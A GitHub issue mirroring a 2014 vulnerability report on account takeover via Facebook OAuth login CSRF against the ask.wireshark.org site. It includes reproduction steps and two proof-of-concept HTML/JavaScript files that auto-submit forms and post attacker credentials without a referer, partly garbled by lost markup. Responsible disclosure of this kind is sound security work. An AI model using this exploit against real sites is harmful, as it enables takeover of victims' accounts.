New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[OSQA-954] Account takeover using facebook OAuth #503

Open
javierder opened this Issue May 13, 2015 · 0 comments

Comments

Projects
None yet
1 participant
@javierder
Member

javierder commented May 13, 2015

[reporter="d3xt0r", created="Thu, 28 Aug 2014 08:41:28 -0400"]
Hey !!




Its me Daksh Patel here ! I would like to report Account takeover using facebook OAuth. I tested this on wireshark . (https://ask.wireshark.org/account/signin/)




Steps to reproduce :



  1. First allow any app to your facebook account like i tested on wireshark.

2) Now open your account and use this files . open this test.html file and it ll call the fb_login.html file and bang !! This ll add the attackers facebook account in victim.

Save the test.html and fb_login.html

I) test.html contains the the auth link to facebook . First open this file :

//test.html


  
   <script type="text/javascript">
 
  function fb_login() {
    return (window.open("./fb_login.html", "_blank",
"status=0,scrollbars=0,menubar=0,resizable=0,scrollbars=0,width=1,height=1"));
  }
 
   function hi_addlogin() {
     document.getElementById("sForm").submit();
  }

 
   function pwn() {
     win1 = fb_login();
     setTimeout("hi_addlogin()", 7000);
     //win1.close()
     win2 = agree();
     setTimeout("fb_login()", 7000);
     //win2.close()
  }
 
   </script>
 
 
 
     action="https://ask.wireshark.org/account/facebook/signin/" method="GET">
      
       value="https://graph.facebook.com/oauth/authorize"
/>
      
    
 
  pwn
  


II) fb_login file contains the facebook login . Change the email and password in this file .


 
   <script type="text/javascript">
  function post_without_referer() {
    // POST request, WebKit & Firefox. Data, meta & form submit trinity
   location = 'data:text/html,https://www.facebook.com/login.php?login_attempt=1\'>' +
              '' +
              '' +
              '' +
              '<script>document.getElementById(\'dynForm\').submit()">';
}
 
   </script>
  


//change the email and password.

//to get victim logged in attacker's account


Lemme know if you need any help .

Regards,
Daksh Patel
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment